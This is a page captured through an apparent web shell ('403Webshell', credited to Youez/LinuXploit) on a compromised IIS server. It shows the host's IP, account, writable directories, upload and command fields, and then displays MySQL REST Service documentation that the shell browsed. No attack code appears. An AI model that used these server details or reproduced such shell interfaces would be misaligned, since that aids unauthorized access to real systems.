403Webshell
Server IP : 185.208.173.17  /  Your IP : 87.236.161.98
Web Server : Microsoft-IIS/10.0
System : Windows NT SRV8576125506 10.0 build 26100 (Windows Server 2016) AMD64
User : IUSR ( 0)
PHP Version : 7.4.13
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/MySQL/MySQL Workbench 8.0/swb/shell/lib/mysqlsh/plugins/mrs_plugin/docs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/MySQL/MySQL Workbench 8.0/swb/shell/lib/mysqlsh/plugins/mrs_plugin/docs/restApi.md
---
title: MRS Core REST APIs
---

This book provides examples of using the MySQL REST Service queries and other operations against tables and views after you have REST-enabled them.

__Chapter Overview__

- [About MRS RESTful Web Services](#about-mrs-restful-web-services)
- [Get Schema Metadata](#get-schema-metadata)
- [Get Object Metadata](#get-object-metadata)
- [Get Object Data](#get-object-data)
- [Insert Table Row](#insert-table-row)
- [Delete Using Filter](#delete-using-filter)
- [Authenticate a REST User](#authenticate-a-rest-user)
- [FilterObject Grammar](#filterobject-grammar)
- [Examples: FilterObject Specifications](#filterobject-grammar-examples)

---

Please also see

- __[MySQL REST Service - Developer's Guide](index.html)__ - This book explains how to install and configure the MySQL REST Service (MRS) as well as how to access the data through REST calls.
- __[MySQL REST Service - Quickstart Guide](quickstart.html)__ - This book provides a hands-on approach to learning how to use the MySQL REST service.
- __[MySQL REST Service - SDK Reference](sdk.html)__ - This book explains how to work with the MRS Software Development Kit and discusses the Client APIs.
- __[MySQL REST Service - SQL Reference](sql.html)__ - This book discusses the MySQL REST Service SQL Extension.

---

!include sections/restApi/About.md

!include sections/restApi/Queries.md

!include sections/restApi/FilterGrammar.md

!include sections/restApi/FilterGrammarExamples.md

!include sections/restApi/Authentication.md

Copyright (c) 2022, 2025, Oracle and/or its affiliates.

Youez - 2016 - github.com/yon3zu
LinuXploit